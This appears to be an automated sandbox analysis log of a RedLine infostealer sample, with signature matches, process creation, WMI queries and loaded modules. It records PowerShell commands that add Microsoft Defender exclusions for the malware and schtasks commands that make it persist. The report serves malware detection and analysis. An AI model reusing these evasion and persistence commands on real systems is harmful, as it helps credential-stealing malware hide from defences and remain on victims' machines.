                    Source: 10.2.TmfmVKU.exe.4399658.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 10.2.TmfmVKU.exe.4399658.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 0.2.lZ8NRWShfC.exe.3f30380.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 0.2.lZ8NRWShfC.exe.3f30380.8.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 0.2.lZ8NRWShfC.exe.3f18560.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 0.2.lZ8NRWShfC.exe.3f18560.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 10.2.TmfmVKU.exe.4399658.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 10.2.TmfmVKU.exe.4399658.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 00000000.00000002.1761835638.0000000003F18000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 00000008.00000002.1870267028.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 0000000A.00000002.1858249007.0000000004399000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: Process Memory Space: lZ8NRWShfC.exe PID: 6884, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: Process Memory Space: lZ8NRWShfC.exe PID: 7216, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: Process Memory Space: TmfmVKU.exe PID: 7308, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: lZ8NRWShfC.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: TmfmVKU.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: lZ8NRWShfC.exe, SliderControl.csBase64 encoded string: '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'
                    Source: TmfmVKU.exe.0.dr, SliderControl.csBase64 encoded string: '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'
                    Source: 0.2.lZ8NRWShfC.exe.40f0200.6.raw.unpack, vr1DF7KsLsBO0eaics.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.lZ8NRWShfC.exe.4149a20.5.raw.unpack, t68jHSoYAIlawlIG5e.csSecurity API names: _0020.SetAccessControl
                    Source: 0.2.lZ8NRWShfC.exe.4149a20.5.raw.unpack, t68jHSoYAIlawlIG5e.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.lZ8NRWShfC.exe.4149a20.5.raw.unpack, t68jHSoYAIlawlIG5e.csSecurity API names: _0020.AddAccessRule
                    Source: 0.2.lZ8NRWShfC.exe.40f0200.6.raw.unpack, t68jHSoYAIlawlIG5e.csSecurity API names: _0020.SetAccessControl
                    Source: 0.2.lZ8NRWShfC.exe.40f0200.6.raw.unpack, t68jHSoYAIlawlIG5e.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.lZ8NRWShfC.exe.40f0200.6.raw.unpack, t68jHSoYAIlawlIG5e.csSecurity API names: _0020.AddAccessRule
                    Source: 0.2.lZ8NRWShfC.exe.4149a20.5.raw.unpack, vr1DF7KsLsBO0eaics.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.lZ8NRWShfC.exe.62b0000.11.raw.unpack, t68jHSoYAIlawlIG5e.csSecurity API names: _0020.SetAccessControl
                    Source: 0.2.lZ8NRWShfC.exe.62b0000.11.raw.unpack, t68jHSoYAIlawlIG5e.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.lZ8NRWShfC.exe.62b0000.11.raw.unpack, t68jHSoYAIlawlIG5e.csSecurity API names: _0020.AddAccessRule
                    Source: 0.2.lZ8NRWShfC.exe.62b0000.11.raw.unpack, vr1DF7KsLsBO0eaics.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@23/99@1/1
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeFile created: C:\Users\user\AppData\Roaming\TmfmVKU.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6280:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7560:120:WilError_03
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeMutant created: \Sessions\1\BaseNamedObjects\vzeqdVeQyCURwFIlVilugOYgBYv
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7136:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7228:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7620:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3612:120:WilError_03
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeFile created: C:\Users\user\AppData\Local\Temp\tmp51ED.tmpJump to behavior
                    Source: lZ8NRWShfC.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: lZ8NRWShfC.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: tmp4F2.tmp.14.dr, tmpE1F8.tmp.8.dr, tmp4F3.tmp.14.dr, tmpE21A.tmp.8.dr, tmpE209.tmp.8.dr, tmp515.tmp.14.dr, tmp4E2.tmp.14.dr, tmpE1D8.tmp.8.dr, tmp4D1.tmp.14.dr, tmpE20A.tmp.8.dr, tmpE22B.tmp.8.dr, tmp504.tmp.14.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: lZ8NRWShfC.exeReversingLabs: Detection: 68%
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeFile read: C:\Users\user\Desktop\lZ8NRWShfC.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\lZ8NRWShfC.exe "C:\Users\user\Desktop\lZ8NRWShfC.exe"
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\lZ8NRWShfC.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\TmfmVKU.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TmfmVKU" /XML "C:\Users\user\AppData\Local\Temp\tmp51ED.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess created: C:\Users\user\Desktop\lZ8NRWShfC.exe "C:\Users\user\Desktop\lZ8NRWShfC.exe"
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess created: C:\Users\user\Desktop\lZ8NRWShfC.exe "C:\Users\user\Desktop\lZ8NRWShfC.exe"
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\TmfmVKU.exe C:\Users\user\AppData\Roaming\TmfmVKU.exe
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TmfmVKU" /XML "C:\Users\user\AppData\Local\Temp\tmp76F9.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess created: C:\Users\user\AppData\Roaming\TmfmVKU.exe "C:\Users\user\AppData\Roaming\TmfmVKU.exe"
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\lZ8NRWShfC.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\TmfmVKU.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TmfmVKU" /XML "C:\Users\user\AppData\Local\Temp\tmp51ED.tmp"Jump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess created: C:\Users\user\Desktop\lZ8NRWShfC.exe "C:\Users\user\Desktop\lZ8NRWShfC.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeProcess created: C:\Users\user\Desktop\lZ8NRWShfC.exe "C:\Users\user\Desktop\lZ8NRWShfC.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TmfmVKU" /XML "C:\Users\user\AppData\Local\Temp\tmp76F9.tmp"
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeProcess created: C:\Users\user\AppData\Roaming\TmfmVKU.exe "C:\Users\user\AppData\Roaming\TmfmVKU.exe"
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeSection loaded: rsaenh.dllJump to behavior
